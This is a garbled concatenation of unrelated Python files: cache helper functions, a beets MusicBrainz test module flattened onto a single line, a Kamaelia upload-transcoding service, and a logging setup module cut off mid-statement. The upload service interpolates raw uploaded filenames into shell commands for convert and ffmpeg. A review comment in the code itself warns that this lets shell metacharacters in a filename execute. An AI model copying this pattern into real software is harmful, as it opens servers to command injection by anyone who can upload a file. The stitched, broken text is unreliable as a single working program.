def set_multi(
    namespace: Literal['exploration'],
    sub_namespace: str | None,
    id_value_mapping: Dict[str, exp_domain.Exploration]
) -> bool: ...


@overload
def set_multi(
    namespace: Literal['collection'],
    sub_namespace: str | None,
    id_value_mapping: Dict[str, collection_domain.Collection]
) -> bool: ...


@overload
def set_multi(
    namespace: Literal['skill'],
    sub_namespace: str | None,
    id_value_mapping: Dict[str, skill_domain.Skill]
) -> bool: ...


@overload
def set_multi(
    namespace: Literal['story'],
    sub_namespace: str | None,
    id_value_mapping: Dict[str, story_domain.Story]
) -> bool: ...


@overload
def set_multi(
    namespace: Literal['topic'],
    sub_namespace: str | None,
    id_value_mapping: Dict[str, topic_domain.Topic]
) -> bool: ...


@overload
def set_multi(
    namespace: Literal['platform'],
    sub_namespace: str | None,
    id_value_mapping: Dict[
        str, platform_parameter_domain.PlatformParameter
    ]
) -> bool: ...


@overload
def set_multi(
    namespace: Literal['config'],
    sub_namespace: str | None,
    id_value_mapping: Dict[str, str]
) -> bool: ...


@overload
def set_multi(
    namespace: Literal['default'],
    sub_namespace: str | None,
    id_value_mapping: Dict[str, str]
) -> bool: ...


def set_multi(
    namespace: NamespaceType,
    sub_namespace: str | None,
    id_value_mapping: Dict[str, Any]
) -> bool:
    """Set multiple id values at once to the cache, where the values are all
    of a specific namespace type or a Redis compatible type (more details
    here: https://redis.io/topics/data-types).

    Args:
        namespace: str. The namespace under which the values associated with
            the id lie. Use CACHE_NAMESPACE_DEFAULT as the namespace for
            objects that are not associated with a conceptual domain-layer
            entity and therefore don't require serialization.
        sub_namespace: str|None. The sub-namespace further differentiates the
            values. For Explorations, Skills, Stories, Topics, and Collections,
            the sub-namespace is either None or the stringified version number
            of the objects. If the sub-namespace is not required, pass in None.
        id_value_mapping:
            dict(str, Exploration|Skill|Story|Topic|Collection|str). A dict of
            {id, value} pairs to set to the cache.

    Raises:
        ValueError. The namespace does not exist or is not recognized.

    Returns:
        bool. Whether all operations complete successfully.
    """
    if len(id_value_mapping) == 0:
        return True

    # Serialize each value with the namespace's encoder before writing it
    # under its fully-qualified cache key.
    memory_cache_id_value_mapping = {
        _get_memcache_key(namespace, sub_namespace, obj_id):
            SERIALIZATION_FUNCTIONS[namespace](value)
        for obj_id, value in id_value_mapping.items()
    }
    return memory_cache_services.set_multi(memory_cache_id_value_mapping)


def delete_multi(
    namespace: NamespaceType,
    sub_namespace: str | None,
    obj_ids: List[str]
) -> bool:
    """Deletes multiple ids in the cache.

    Args:
        namespace: str. The namespace under which the values associated with
            the id lie. Use CACHE_NAMESPACE_DEFAULT namespace for object ids
            that are not associated with a conceptual domain-layer entity and
            therefore don't require serialization.
        sub_namespace: str|None. The sub-namespace further differentiates the
            values. For Explorations, Skills, Stories, Topics, and Collections,
            the sub-namespace is either None or the stringified version number
            of the objects. If the sub-namespace is not required, pass in None.
        obj_ids: list(str). A list of id strings to delete from the cache.

    Raises:
        ValueError. The namespace does not exist or is not recognized.

    Returns:
        bool. Whether all operations complete successfully.
    """
    if len(obj_ids) == 0:
        return True

    memcache_keys = [
        _get_memcache_key(namespace, sub_namespace, obj_id)
        for obj_id in obj_ids]
    # Success means the backend reports exactly as many deletions as keys
    # requested.
    return memory_cache_services.delete_multi(memcache_keys) == len(obj_ids)


def get_memory_cache_stats() -> caching_domain.MemoryCacheStats:
    """Get a memory profile of the cache in a dictionary dependent on how the
    caching service profiles its own cache.

    Returns:
        MemoryCacheStats. MemoryCacheStats object containing the total
        allocated memory in bytes, peak memory usage in bytes, and the total
        number of keys stored as values.
    """
    return memory_cache_services.get_memory_cache_stats()
# This file is part of beets. # Copyright 2015, Adrian Sampson. # # Permission is hereby granted, free of charge, to any person obtaining # a copy of this software and associated documentation files (the # "Software"), to deal in the Software without restriction, including # without limitation the rights to use, copy, modify, merge, publish, # distribute, sublicense, and/or sell copies of the Software, and to # permit persons to whom the Software is furnished to do so, subject to # the following conditions: # # The above copyright notice and this permission notice shall be # included in all copies or substantial portions of the Software. """Tests for MusicBrainz API wrapper. """ from __future__ import (division, absolute_import, print_function, unicode_literals) from test import _common from test._common import unittest from beets.autotag import mb from beets import config import mock class MBAlbumInfoTest(_common.TestCase): def _make_release(self, date_str='2009', tracks=None, track_length=None, track_artist=False): release = { 'title': 'ALBUM TITLE', 'id': 'ALBUM ID', 'asin': 'ALBUM ASIN', 'disambiguation': 'R_DISAMBIGUATION', 'release-group': { 'type': 'Album', 'first-release-date': date_str, 'id': 'RELEASE GROUP ID', 'disambiguation': 'RG_DISAMBIGUATION', }, 'artist-credit': [ { 'artist': { 'name': 'ARTIST NAME', 'id': 'ARTIST ID', 'sort-name': 'ARTIST SORT NAME', }, 'name': 'ARTIST CREDIT', } ], 'date': '3001', 'medium-list': [], 'label-info-list': [{ 'catalog-number': 'CATALOG NUMBER', 'label': {'name': 'LABEL NAME'}, }], 'text-representation': { 'script': 'SCRIPT', 'language': 'LANGUAGE', }, 'country': 'COUNTRY', 'status': 'STATUS', } if tracks: track_list = [] for i, recording in enumerate(tracks): track = { 'recording': recording, 'position': bytes(i + 1), } if track_length: # Track lengths are distinct from recording lengths. track['length'] = track_length if track_artist: # Similarly, track artists can differ from recording # artists. 
track['artist-credit'] = [ { 'artist': { 'name': 'TRACK ARTIST NAME', 'id': 'TRACK ARTIST ID', 'sort-name': 'TRACK ARTIST SORT NAME', }, 'name': 'TRACK ARTIST CREDIT', } ] track_list.append(track) release['medium-list'].append({ 'position': '1', 'track-list': track_list, 'format': 'FORMAT', 'title': 'MEDIUM TITLE', }) return release def _make_track(self, title, tr_id, duration, artist=False): track = { 'title': title, 'id': tr_id, } if duration is not None: track['length'] = duration if artist: track['artist-credit'] = [ { 'artist': { 'name': 'RECORDING ARTIST NAME', 'id': 'RECORDING ARTIST ID', 'sort-name': 'RECORDING ARTIST SORT NAME', }, 'name': 'RECORDING ARTIST CREDIT', } ] return track def test_parse_release_with_year(self): release = self._make_release('1984') d = mb.album_info(release) self.assertEqual(d.album, 'ALBUM TITLE') self.assertEqual(d.album_id, 'ALBUM ID') self.assertEqual(d.artist, 'ARTIST NAME') self.assertEqual(d.artist_id, 'ARTIST ID') self.assertEqual(d.original_year, 1984) self.assertEqual(d.year, 3001) self.assertEqual(d.artist_credit, 'ARTIST CREDIT') def test_parse_release_type(self): release = self._make_release('1984') d = mb.album_info(release) self.assertEqual(d.albumtype, 'album') def test_parse_release_full_date(self): release = self._make_release('1987-03-31') d = mb.album_info(release) self.assertEqual(d.original_year, 1987) self.assertEqual(d.original_month, 3) self.assertEqual(d.original_day, 31) def test_parse_tracks(self): tracks = [self._make_track('TITLE ONE', 'ID ONE', 100.0 * 1000.0), self._make_track('TITLE TWO', 'ID TWO', 200.0 * 1000.0)] release = self._make_release(tracks=tracks) d = mb.album_info(release) t = d.tracks self.assertEqual(len(t), 2) self.assertEqual(t[0].title, 'TITLE ONE') self.assertEqual(t[0].track_id, 'ID ONE') self.assertEqual(t[0].length, 100.0) self.assertEqual(t[1].title, 'TITLE TWO') self.assertEqual(t[1].track_id, 'ID TWO') self.assertEqual(t[1].length, 200.0) def test_parse_track_indices(self): 
tracks = [self._make_track('TITLE ONE', 'ID ONE', 100.0 * 1000.0), self._make_track('TITLE TWO', 'ID TWO', 200.0 * 1000.0)] release = self._make_release(tracks=tracks) d = mb.album_info(release) t = d.tracks self.assertEqual(t[0].medium_index, 1) self.assertEqual(t[0].index, 1) self.assertEqual(t[1].medium_index, 2) self.assertEqual(t[1].index, 2) def test_parse_medium_numbers_single_medium(self): tracks = [self._make_track('TITLE ONE', 'ID ONE', 100.0 * 1000.0), self._make_track('TITLE TWO', 'ID TWO', 200.0 * 1000.0)] release = self._make_release(tracks=tracks) d = mb.album_info(release) self.assertEqual(d.mediums, 1) t = d.tracks self.assertEqual(t[0].medium, 1) self.assertEqual(t[1].medium, 1) def test_parse_medium_numbers_two_mediums(self): tracks = [self._make_track('TITLE ONE', 'ID ONE', 100.0 * 1000.0), self._make_track('TITLE TWO', 'ID TWO', 200.0 * 1000.0)] release = self._make_release(tracks=[tracks[0]]) second_track_list = [{ 'recording': tracks[1], 'position': '1', }] release['medium-list'].append({ 'position': '2', 'track-list': second_track_list, }) d = mb.album_info(release) self.assertEqual(d.mediums, 2) t = d.tracks self.assertEqual(t[0].medium, 1) self.assertEqual(t[0].medium_index, 1) self.assertEqual(t[0].index, 1) self.assertEqual(t[1].medium, 2) self.assertEqual(t[1].medium_index, 1) self.assertEqual(t[1].index, 2) def test_parse_release_year_month_only(self): release = self._make_release('1987-03') d = mb.album_info(release) self.assertEqual(d.original_year, 1987) self.assertEqual(d.original_month, 3) def test_no_durations(self): tracks = [self._make_track('TITLE', 'ID', None)] release = self._make_release(tracks=tracks) d = mb.album_info(release) self.assertEqual(d.tracks[0].length, None) def test_track_length_overrides_recording_length(self): tracks = [self._make_track('TITLE', 'ID', 1.0 * 1000.0)] release = self._make_release(tracks=tracks, track_length=2.0 * 1000.0) d = mb.album_info(release) self.assertEqual(d.tracks[0].length, 2.0) def 
test_no_release_date(self): release = self._make_release(None) d = mb.album_info(release) self.assertFalse(d.original_year) self.assertFalse(d.original_month) self.assertFalse(d.original_day) def test_various_artists_defaults_false(self): release = self._make_release(None) d = mb.album_info(release) self.assertFalse(d.va) def test_detect_various_artists(self): release = self._make_release(None) release['artist-credit'][0]['artist']['id'] = \ mb.VARIOUS_ARTISTS_ID d = mb.album_info(release) self.assertTrue(d.va) def test_parse_artist_sort_name(self): release = self._make_release(None) d = mb.album_info(release) self.assertEqual(d.artist_sort, 'ARTIST SORT NAME') def test_parse_releasegroupid(self): release = self._make_release(None) d = mb.album_info(release) self.assertEqual(d.releasegroup_id, 'RELEASE GROUP ID') def test_parse_asin(self): release = self._make_release(None) d = mb.album_info(release) self.assertEqual(d.asin, 'ALBUM ASIN') def test_parse_catalognum(self): release = self._make_release(None) d = mb.album_info(release) self.assertEqual(d.catalognum, 'CATALOG NUMBER') def test_parse_textrepr(self): release = self._make_release(None) d = mb.album_info(release) self.assertEqual(d.script, 'SCRIPT') self.assertEqual(d.language, 'LANGUAGE') def test_parse_country(self): release = self._make_release(None) d = mb.album_info(release) self.assertEqual(d.country, 'COUNTRY') def test_parse_status(self): release = self._make_release(None) d = mb.album_info(release) self.assertEqual(d.albumstatus, 'STATUS') def test_parse_media(self): tracks = [self._make_track('TITLE ONE', 'ID ONE', 100.0 * 1000.0), self._make_track('TITLE TWO', 'ID TWO', 200.0 * 1000.0)] release = self._make_release(None, tracks=tracks) d = mb.album_info(release) self.assertEqual(d.media, 'FORMAT') def test_parse_disambig(self): release = self._make_release(None) d = mb.album_info(release) self.assertEqual(d.albumdisambig, 'RG_DISAMBIGUATION, R_DISAMBIGUATION') def test_parse_disctitle(self): 
tracks = [self._make_track('TITLE ONE', 'ID ONE', 100.0 * 1000.0), self._make_track('TITLE TWO', 'ID TWO', 200.0 * 1000.0)] release = self._make_release(None, tracks=tracks) d = mb.album_info(release) t = d.tracks self.assertEqual(t[0].disctitle, 'MEDIUM TITLE') self.assertEqual(t[1].disctitle, 'MEDIUM TITLE') def test_missing_language(self): release = self._make_release(None) del release['text-representation']['language'] d = mb.album_info(release) self.assertEqual(d.language, None) def test_parse_recording_artist(self): tracks = [self._make_track('a', 'b', 1, True)] release = self._make_release(None, tracks=tracks) track = mb.album_info(release).tracks[0] self.assertEqual(track.artist, 'RECORDING ARTIST NAME') self.assertEqual(track.artist_id, 'RECORDING ARTIST ID') self.assertEqual(track.artist_sort, 'RECORDING ARTIST SORT NAME') self.assertEqual(track.artist_credit, 'RECORDING ARTIST CREDIT') def test_track_artist_overrides_recording_artist(self): tracks = [self._make_track('a', 'b', 1, True)] release = self._make_release(None, tracks=tracks, track_artist=True) track = mb.album_info(release).tracks[0] self.assertEqual(track.artist, 'TRACK ARTIST NAME') self.assertEqual(track.artist_id, 'TRACK ARTIST ID') self.assertEqual(track.artist_sort, 'TRACK ARTIST SORT NAME') self.assertEqual(track.artist_credit, 'TRACK ARTIST CREDIT') def test_data_source(self): release = self._make_release() d = mb.album_info(release) self.assertEqual(d.data_source, 'MusicBrainz') class ParseIDTest(_common.TestCase): def test_parse_id_correct(self): id_string = "28e32c71-1450-463e-92bf-e0a46446fc11" out = mb._parse_id(id_string) self.assertEqual(out, id_string) def test_parse_id_non_id_returns_none(self): id_string = "blah blah" out = mb._parse_id(id_string) self.assertEqual(out, None) def test_parse_id_url_finds_id(self): id_string = "28e32c71-1450-463e-92bf-e0a46446fc11" id_url = "http://musicbrainz.org/entity/%s" % id_string out = mb._parse_id(id_url) self.assertEqual(out, id_string) 
class ArtistFlatteningTest(_common.TestCase): def _credit_dict(self, suffix=''): return { 'artist': { 'name': 'NAME' + suffix, 'sort-name': 'SORT' + suffix, }, 'name': 'CREDIT' + suffix, } def _add_alias(self, credit_dict, suffix='', locale='', primary=False): alias = { 'alias': 'ALIAS' + suffix, 'locale': locale, 'sort-name': 'ALIASSORT' + suffix } if primary: alias['primary'] = 'primary' if 'alias-list' not in credit_dict['artist']: credit_dict['artist']['alias-list'] = [] credit_dict['artist']['alias-list'].append(alias) def test_single_artist(self): a, s, c = mb._flatten_artist_credit([self._credit_dict()]) self.assertEqual(a, 'NAME') self.assertEqual(s, 'SORT') self.assertEqual(c, 'CREDIT') def test_two_artists(self): a, s, c = mb._flatten_artist_credit( [self._credit_dict('a'), ' AND ', self._credit_dict('b')] ) self.assertEqual(a, 'NAMEa AND NAMEb') self.assertEqual(s, 'SORTa AND SORTb') self.assertEqual(c, 'CREDITa AND CREDITb') def test_alias(self): credit_dict = self._credit_dict() self._add_alias(credit_dict, suffix='en', locale='en', primary=True) self._add_alias(credit_dict, suffix='en_GB', locale='en_GB', primary=True) self._add_alias(credit_dict, suffix='fr', locale='fr') self._add_alias(credit_dict, suffix='fr_P', locale='fr', primary=True) self._add_alias(credit_dict, suffix='pt_BR', locale='pt_BR') # test no alias config['import']['languages'] = [''] flat = mb._flatten_artist_credit([credit_dict]) self.assertEqual(flat, ('NAME', 'SORT', 'CREDIT')) # test en primary config['import']['languages'] = ['en'] flat = mb._flatten_artist_credit([credit_dict]) self.assertEqual(flat, ('ALIASen', 'ALIASSORTen', 'CREDIT')) # test en_GB en primary config['import']['languages'] = ['en_GB', 'en'] flat = mb._flatten_artist_credit([credit_dict]) self.assertEqual(flat, ('ALIASen_GB', 'ALIASSORTen_GB', 'CREDIT')) # test en en_GB primary config['import']['languages'] = ['en', 'en_GB'] flat = mb._flatten_artist_credit([credit_dict]) self.assertEqual(flat, ('ALIASen', 
'ALIASSORTen', 'CREDIT')) # test fr primary config['import']['languages'] = ['fr'] flat = mb._flatten_artist_credit([credit_dict]) self.assertEqual(flat, ('ALIASfr_P', 'ALIASSORTfr_P', 'CREDIT')) # test for not matching non-primary config['import']['languages'] = ['pt_BR', 'fr'] flat = mb._flatten_artist_credit([credit_dict]) self.assertEqual(flat, ('ALIASfr_P', 'ALIASSORTfr_P', 'CREDIT')) class MBLibraryTest(unittest.TestCase): def test_match_track(self): with mock.patch('musicbrainzngs.search_recordings') as p: p.return_value = { 'recording-list': [{ 'title': 'foo', 'id': 'bar', 'length': 42, }], } ti = list(mb.match_track('hello', 'there'))[0] p.assert_called_with(artist='hello', recording='there', limit=5) self.assertEqual(ti.title, 'foo') self.assertEqual(ti.track_id, 'bar') def test_match_album(self): mbid = 'd2a6f856-b553-40a0-ac54-a321e8e2da99' with mock.patch('musicbrainzngs.search_releases') as sp: sp.return_value = { 'release-list': [{ 'id': mbid, }], } with mock.patch('musicbrainzngs.get_release_by_id') as gp: gp.return_value = { 'release': { 'title': 'hi', 'id': mbid, 'medium-list': [{ 'track-list': [{ 'recording': { 'title': 'foo', 'id': 'bar', 'length': 42, }, 'position': 9, }], 'position': 5, }], 'artist-credit': [{ 'artist': { 'name': 'some-artist', 'id': 'some-id', }, }], 'release-group': { 'id': 'another-id', } } } ai = list(mb.match_album('hello', 'there'))[0] sp.assert_called_with(artist='hello', release='there', limit=5) gp.assert_called_with(mbid, mock.ANY) self.assertEqual(ai.tracks[0].title, 'foo') self.assertEqual(ai.album, 'hi') def test_match_track_empty(self): with mock.patch('musicbrainzngs.search_recordings') as p: til = list(mb.match_track(' ', ' ')) self.assertFalse(p.called) self.assertEqual(til, []) def test_match_album_empty(self): with mock.patch('musicbrainzngs.search_releases') as p: ail = list(mb.match_album(' ', ' ')) self.assertFalse(p.called) self.assertEqual(ail, []) def suite(): return 
unittest.TestLoader().loadTestsFromName(__name__) if __name__ == b'__main__': unittest.main(defaultTest='suite')
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright 2010 British Broadcasting Corporation and Kamaelia Contributors(1)
#
# (1) Kamaelia Contributors are listed in the AUTHORS file and at
#     http://www.kamaelia.org/AUTHORS - please extend this file,
#     not this notice.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Batch upload converter (Python 2, Kamaelia/Axon).

Watches an incoming uploads directory, moves images and videos into their
own queues, then transcodes them (ImageMagick ``convert`` / ``ffmpeg``)
into moderation queues.
"""

import os
import time

import Axon
import Image

from Kamaelia.Chassis.Pipeline import Pipeline
from Kamaelia.File.UnixProcess import UnixProcess


class DirectoryWatcher(Axon.ThreadedComponent.threadedcomponent):
    """Polls ``watch`` once per second and sends the directory name on
    "outbox" whenever its mtime changes (and once at startup)."""

    watch = "uploads"  # directory to poll

    def main(self):
        S = None  # previous os.stat() result; None until the first poll
        while True:
            N = os.stat(self.watch)
            if S != N:
                if S != None:
                    # Only announce when the modification time changed.
                    if S.st_mtime != N.st_mtime:
                        print "uploads changed, processing", S==N, list(S), list(N)
                        S = N
                        self.send(self.watch, "outbox")
                else:
                    # First poll: always announce the directory once.
                    print "initialising, checking uploads", S==N, S, list(N)
                    S = N
                    self.send(self.watch, "outbox")
            time.sleep(1)


class FileProcessor(Axon.Component.component):
    """Base component: for each inbox message naming a directory, runs
    processfile() over every file in that directory.

    Subclasses override processfile() (a generator)."""

    Inboxes = {
        "inbox": "-",
        "control": "-",
        "_unixprocessdone": "-",  # completion signal from spawned UnixProcess
    }

    def Inline(self, X, outbox="outbox", signal="signal", inbox="inbox",
               control="control"):
        """Run child component X to completion, wired to our own boxes;
        returns a WaitComplete ipc object to be yielded by the caller."""
        def Y(X, outbox, signal, inbox, control):
            L1 = self.link((X, signal), (self, control))
            L2 = self.link((X, outbox), (self, inbox))
            X.activate()
            yield 1
            # Wait for the child to signal shutdown on our control box.
            while not self.dataReady(control):
                yield 1
            self.recv(control)
            self.unlink(L1)
            self.unlink(L2)
            del X
        return Axon.Ipc.WaitComplete(Y(X, outbox, signal, inbox, control))

    def system(self, command):
        """Run a shell command via a child UnixProcess.

        NOTE(review): callers interpolate raw upload filenames into the
        command string — shell metacharacters in a filename would be
        executed. Needs quoting/escaping; confirm upstream sanitisation.
        """
        return self.Inline(
            UnixProcess(command + ";sleep 0.2"),
            control="_unixprocessdone"
        )

    def processfile(self, directory, filename):
        # Default no-op implementation; subclasses do the real work.
        print " ... processing:", filename
        yield 1

    def processfiles(self, directory):
        # Process every file currently present in the changed directory.
        print "Directory changed: ", directory
        for filename in os.listdir(directory):
            for i in self.processfile(directory, filename):
                yield i

    def main(self):
        while True:
            while not self.anyReady():
                self.pause()
                yield 1
            for message in self.Inbox("inbox"):
                for i in self.processfiles(message):
                    yield i
            yield 1


class ImageTranscoder(FileProcessor):
    """Renders each uploaded image into fixed-width JPEG variants under
    destdir/<basename>/, then deletes the source file."""

    destdir = "moderate"
    # Variant name -> target width in pixels.
    sizes = {
        "large": 626,
        "normal": 466,
        "medium": 306,
        "thumb": 146,
        "minithumb": 66,
        "microthumb": 18,
    }

    def processfile(self, directory, filename):
        thefile = filename[:filename.rfind(".")]
        file_ending = filename[filename.rfind("."):]  # NOTE(review): unused
        print thefile
        try:
            os.makedirs(os.path.join(self.destdir, thefile))
        except OSError:
            # Destination already exists (or cannot be created): skip file.
            return
        sourcefile = os.path.join(directory, filename)
        try:
            X = Image.open(sourcefile)
            size = X.size
            X = None  # drop the PIL image; only its dimensions are needed
            side_size = min(*size)  # shorter side, used for square cropping
        except IOError:
            # Not an image PIL can read: leave it alone.
            return
        for size in self.sizes:
            if size == "microthumb":
                # Special case: emit an 18px "nanothumb" AND a 40px
                # "microthumb", both square-cropped to the short side.
                dest_file1 = self.destdir + "/" + thefile + "/" + "nanothumb" + ".jpg"
                dest_file2 = self.destdir + "/" + thefile + "/" + size + ".jpg"
                print "convert %s -crop %dx%d+0+0 -resize 18x %s" % (sourcefile, side_size, side_size, dest_file1)
                yield self.system("convert %s -crop %dx%d+0+0 -resize 18x %s" % (sourcefile, side_size, side_size, dest_file1))
                print "convert %s -crop %dx%d+0+0 -resize 40x %s" % (sourcefile, side_size, side_size, dest_file2)
                yield self.system("convert %s -crop %dx%d+0+0 -resize 40x %s" % (sourcefile, side_size, side_size, dest_file2))
            else:
                width = self.sizes[size]
                dest_filename = size + "-" + filename
                # NOTE(review): this assignment is immediately overwritten
                # by the next line — dead code.
                full_dest_filename = os.path.join(self.destdir, dest_filename)
                full_dest_filename = self.destdir + "/" + thefile + "/" + size + ".jpg"
                resize_arg = "-resize %dx" % width
                print "convert", sourcefile, resize_arg, full_dest_filename
                yield self.system(" ".join(["convert", sourcefile, resize_arg, full_dest_filename]))
        os.unlink(sourcefile)


class ImageMover(FileProcessor):
    """Moves files with known image extensions into destdir."""

    destdir = "/tmp"

    def processfile(self, directory, filename):
        extn = filename[filename.rfind("."):].lower()
        if extn in [".jpg", ".jpeg", ".png", ".gif", ".bmp", ".ppm", ".pnm"]:
            os.rename(os.path.join(directory, filename),
                      os.path.join(self.destdir, filename))
        yield 1


class VideoTranscoder(FileProcessor):
    """Transcodes each uploaded video to FLV (``conversion`` command) and
    writes a player HTML page from ``template``."""

    destdir = "moderate"
    conversion = "ffmpeg -i %(sourcefile)s %(deststem)s.flv"
    template = "player-template.html"

    def processfile(self, directory, filename):
        thefile = filename[:filename.rfind(".")]
        sourcefile = os.path.join(directory, filename)
        command = self.conversion % {
            "sourcefile": sourcefile,
            "deststem": self.destdir + "/" + thefile,
        }
        yield self.system(command)
        # Fill in the HTML player template for the produced .flv file.
        F = open(self.template)
        t = F.read()
        F.close()
        X = t % {"videofile": thefile + ".flv"}
        F = open(self.destdir + "/" + thefile + ".html", "w")
        F.write(X)
        F.close()
        os.unlink(sourcefile)


class VideoMover(FileProcessor):
    """Moves files with known video extensions into destdir."""

    destdir = "/tmp"
    extensions = [".3gp", ".3gp2", ".3gpp", ".asf", ".asx", ".avi", ".dv",
                  ".flv", ".m1v", ".m4e", ".m4u", ".m4v", ".mjp", ".moov",
                  ".mov", ".movie", ".mp4", ".mpe", ".mpeg", ".mpg", ".qt",
                  ".rm", ".swf", ".ts", ".wmv"]

    def processfile(self, directory, filename):
        extn = filename[filename.rfind("."):].lower()
        # NOTE(review): extn is already lowercased; the second .lower() is
        # redundant but harmless.
        if extn.lower() in self.extensions:
            os.rename(os.path.join(directory, filename),
                      os.path.join(self.destdir, filename))
        yield 1


def read_config(filename):
    """Parse ``filename`` as whitespace-separated key/value lines.

    Blank lines and '#' comments are skipped; unparseable lines are
    reported and ignored. Returns {} if the file cannot be read at all.
    """
    conf = {}
    try:
        F = open(filename)
        for line in F:
            line = line.strip().rstrip()
            if line == "":
                continue
            if line[0] == "#":
                continue
            try:
                key, value = line.split()
                conf[key] = value
            except:
                # Deliberate best-effort: a bad line must not abort parsing.
                print "BAD CONFIG LINE: ", repr(line)
        F.close()
    except:
        # NOTE(review): bare except also hides real errors (permissions,
        # encoding); consider narrowing to IOError.
        print "General error parsing", filename
    return conf


# Effective configuration: defaults, overridden by the distributed file,
# then by the local file.
conf = {}
default_conf = {
    "main_incoming_queue": "/tmp/uploads",
    "image_queue": "/tmp/uploads/images",
    "video_queue": "/tmp/uploads/videos",
    "image_moderation_queue": "/tmp/moderate/images",
    "video_moderation_queue": "/tmp/moderate/videos",
}
local_def_conf = read_config("/etc/batch_converter.conf.dist")
local_conf = read_config("/etc/batch_converter.conf")
conf.update(default_conf)
conf.update(local_def_conf)
conf.update(local_conf)

# Wire up the four watch/process pipelines; the final .run() drives the
# whole Axon scheduler (the three .activate() calls just register them).
Pipeline(
    DirectoryWatcher(watch=conf["main_incoming_queue"]),
    ImageMover(destdir=conf["image_queue"]),
).activate()

Pipeline(
    DirectoryWatcher(watch=conf["image_queue"]),
    ImageTranscoder(destdir=conf["image_moderation_queue"]),
).activate()

Pipeline(
    DirectoryWatcher(watch=conf["main_incoming_queue"]),
    VideoMover(destdir=conf["video_queue"]),
).activate()

Pipeline(
    DirectoryWatcher(watch=conf["video_queue"]),
    VideoTranscoder(destdir=conf["video_moderation_queue"]),
).run()
#!/usr/bin/env python
# encoding: utf-8
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Created on 2013-8-17
# Copyright 2013 nuoqingyun xuqifeng
"""Logging setup helpers driven by oslo.config options.

Call setup() once at startup, then getLogger(name, version) to obtain a
ContextAdapter that stamps project/version info onto every record.
"""

import inspect
import logging
import logging.handlers
import os
import stat
import sys

from oslo.config import cfg

log_opts = [
    # Fixed: use_syslog/use_stderr defaults were the *string* 'False',
    # which is truthy — a BoolOpt default must be a real bool.
    cfg.BoolOpt('use_syslog', default=False,
                help="send log lines to syslog"),
    cfg.BoolOpt('debug', default=False,
                help="log at DEBUG level"),
    cfg.BoolOpt('verbose', default=True,
                help="log at INFO level"),
    cfg.BoolOpt('use_stderr', default=False,
                help="also log to a colorized stream handler"),
    cfg.StrOpt('logfile_mode', default='0644',
               help="the default log file mode (octal string)"),
    cfg.StrOpt('log_file', default='/var/log/glance.log',
               help="path of the log file"),
    cfg.StrOpt('log_date_format', default='%Y-%m-%d %H:%M:%S',
               help='strftime format used for %(asctime)s'),
    cfg.StrOpt('log_format',
               default='%(asctime)s %(levelname)8s [%(name)s] %(message)s',
               help='format string for log records'),
    cfg.ListOpt('default_log_levels',
                default=[
                    'amqplib=WARN',
                    'sqlalchemy=WARN',
                    # Fixed: a missing comma made these two entries one
                    # concatenated string 'suds=INFOeventlet.wsgi.server=WARN'.
                    'suds=INFO',
                    'eventlet.wsgi.server=WARN',
                ],
                help='list of logger=LEVEL pairs'),
    cfg.StrOpt('syslog_log_facility', default='LOG_USER',
               help='syslog facility to receive log lines'),
    cfg.StrOpt('log-dir', default='',
               help='directory to hold log files'),
]

CONF = cfg.CONF
CONF.register_opts(log_opts)

# Custom AUDIT level between INFO and WARNING; the stdlib has no AUDIT.
# (The original used logging.AUDIR, which does not exist -> AttributeError.)
AUDIT = logging.INFO + 1
logging.addLevelName(AUDIT, 'AUDIT')

# Cache of ContextAdapter instances, keyed by logger name.
_loggers = {}


class ColorHandler(logging.StreamHandler):
    """Stream handler that attaches an ANSI color escape to each record."""

    LEVEL_COLORS = {
        logging.DEBUG: '\033[00;32m',
        logging.INFO: '\033[00;36m',
        AUDIT: '\033[01;36m',
        logging.WARN: '\033[01;33m',
        logging.ERROR: '\033[01;31m',
        logging.CRITICAL: '\033[01;31m',
    }

    def format(self, record):
        # .get() so records at unmapped levels don't raise KeyError
        # (the original indexed the dict directly).
        record.color = self.LEVEL_COLORS.get(record.levelno, '')
        return logging.StreamHandler.format(self, record)


class LegacyFormatter(logging.Formatter):
    """Formatter that re-reads its format string from CONF at format time.

    The original read two *unregistered* options (raising NoSuchOptError)
    and never returned a value; it now uses the registered log_format
    option and delegates to the base class.
    """

    def format(self, record):
        if CONF.log_format:
            self._fmt = CONF.log_format
        return logging.Formatter.format(self, record)


class ContextAdapter(logging.LoggerAdapter):
    """LoggerAdapter that stamps project name and version onto records."""

    def __init__(self, logger, project_name, version):
        self.logger = logger
        self.project = project_name
        self.version = version

    @property
    def handlers(self):
        return self.logger.handlers

    def audit(self, msg, *args, **kwargs):
        # Fixed: was self.log(logging.AUDIR, ...) — AttributeError at the
        # first audit() call; use the module-level AUDIT level instead.
        self.log(AUDIT, msg, *args, **kwargs)

    def deprecated(self, msg, *args, **kwargs):
        # Intentional no-op, kept for API compatibility with callers.
        pass

    def process(self, msg, kwargs):
        # Inject project/version metadata into every record's `extra`.
        if 'extra' not in kwargs:
            kwargs['extra'] = {}
        extra = kwargs['extra']
        extra.update({'sitename': self.project})
        extra.update({'project': self.project})
        extra.update({'version': self.version})
        extra['extra'] = extra.copy()
        return msg, kwargs


def _setup_logging_from_conf(product_name):
    """(Re)build the root logger's handlers and levels from CONF."""
    log_root = getLogger(None).logger
    for handler in log_root.handlers:
        log_root.removeHandler(handler)

    if CONF.use_syslog:
        facility = _find_facility_from_conf()
        syslog = logging.handlers.SysLogHandler(address='/dev/log',
                                                facility=facility)
        log_root.addHandler(syslog)

    log_path = _get_log_file_path()
    if log_path:
        filelog = logging.handlers.WatchedFileHandler(log_path)
        log_root.addHandler(filelog)

        # Enforce the configured (octal string) file mode on the log file.
        mode = int(CONF.logfile_mode, 8)
        st = os.stat(log_path)
        if st.st_mode != (stat.S_IFREG | mode):
            os.chmod(log_path, mode)

    if CONF.use_stderr:
        streamlog = ColorHandler()
        log_root.addHandler(streamlog)
    elif not CONF.log_file:
        # No log file configured: fall back to plain stdout.
        streamlog = logging.StreamHandler(sys.stdout)
        log_root.addHandler(streamlog)

    for handler in log_root.handlers:
        dateformat = CONF.log_date_format
        if CONF.log_format:
            handler.setFormatter(logging.Formatter(fmt=CONF.log_format,
